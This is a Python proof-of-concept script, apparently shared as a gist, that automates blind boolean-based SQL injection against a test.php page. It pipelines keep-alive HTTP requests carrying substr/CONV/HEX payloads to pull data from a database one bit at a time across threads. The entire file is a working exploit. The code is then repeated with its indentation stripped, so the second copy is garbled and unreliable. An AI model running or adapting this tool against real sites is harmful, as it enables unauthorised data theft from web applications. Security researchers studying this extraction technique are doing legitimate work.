cyberpunkych/poc.py

## poc.py
import socket, time, re, sys
from multiprocessing.dummy import Pool as ThreadPool

bad_answ = """<table>
</table>"""

good_answ = """<table>
	<tr>
		<td></td>
		<td></td>
		<td></td>
	</tr>
</table>"""

s_time = time.time()

timeout = float(sys.argv[3]) # Set timeout for correct keep-alive


pool = ThreadPool(int(sys.argv[2])) # Count threads


print "Threads count - "+sys.argv[2]
print "Timeout for keep-alive - "+sys.argv[3]

def request(len, query):
	num = ""
	req = ""
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("127.0.0.1", 80))
	for pg_n in range(1,9):
		req += "GET /test.php?a=1+and+substr(REVERSE(CONV(HEX(substr("
		req += query+",+"+str(len)+",1)),+16,+2)),+"+str(pg_n)+",+1)=1+--+ HTTP/1.1\r\n"
		req += "Host: 127.0.0.1\r\nConnection: keep-alive\r\n\r\n"
	req += "HEAD /test.php HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n"
	s.send(req)

	time.sleep(timeout)
	res = s.recv(640000000)

	for i in res.split("\r\n\r\n"):
		if good_answ in i.split("HTTP/1.")[0]:
			num+="1"
		elif bad_answ in i.split("HTTP/1.")[0]:
			num+="0"

	return chr(int(num[::-1], 2))
	s.close()

def request_len(inj):
	reslt = ""
	for i in range(1,5):
		reslt+=request(i, "length("+inj+")")
	print "\nLength is "+reslt.split('\0')[0]
	return reslt.split('\0')[0]

def make_request(inj):
	str_len = request_len(inj)
	reslt = ""
	# for i in range(1,int(str_len)+1):
	# 	print reslt
	# 	reslt+=request(i, inj)
	reslt = pool.map(lambda x: request(x, inj), range(1,int(str_len)+1))
	return ''.join(reslt)


try:
	print("\nResult - %s" % make_request("("+sys.argv[1]+")"))
except:
	pass


print("\nTime: %sms" % (time.time() - s_time))
	import socket, time, re, sys
	from multiprocessing.dummy import Pool as ThreadPool

	bad_answ = """<table>
	</table>"""

	good_answ = """<table>
	<tr>
	<td></td>
	<td></td>
	<td></td>
	</tr>
	</table>"""

	s_time = time.time()

	timeout = float(sys.argv[3]) # Set timeout for correct keep-alive


	pool = ThreadPool(int(sys.argv[2])) # Count threads


	print "Threads count - "+sys.argv[2]
	print "Timeout for keep-alive - "+sys.argv[3]

	def request(len, query):
	num = ""
	req = ""
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("127.0.0.1", 80))
	for pg_n in range(1,9):
	req += "GET /test.php?a=1+and+substr(REVERSE(CONV(HEX(substr("
	req += query+",+"+str(len)+",1)),+16,+2)),+"+str(pg_n)+",+1)=1+--+ HTTP/1.1\r\n"
	req += "Host: 127.0.0.1\r\nConnection: keep-alive\r\n\r\n"
	req += "HEAD /test.php HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n"
	s.send(req)

	time.sleep(timeout)
	res = s.recv(640000000)

	for i in res.split("\r\n\r\n"):
	if good_answ in i.split("HTTP/1.")[0]:
	num+="1"
	elif bad_answ in i.split("HTTP/1.")[0]:
	num+="0"

	return chr(int(num[::-1], 2))
	s.close()

	def request_len(inj):
	reslt = ""
	for i in range(1,5):
	reslt+=request(i, "length("+inj+")")
	print "\nLength is "+reslt.split('\0')[0]
	return reslt.split('\0')[0]

	def make_request(inj):
	str_len = request_len(inj)
	reslt = ""
	# for i in range(1,int(str_len)+1):
	# print reslt
	# reslt+=request(i, inj)
	reslt = pool.map(lambda x: request(x, inj), range(1,int(str_len)+1))
	return ''.join(reslt)


	try:
	print("\nResult - %s" % make_request("("+sys.argv[1]+")"))
	except:
	pass



	print("\nTime: %sms" % (time.time() - s_time))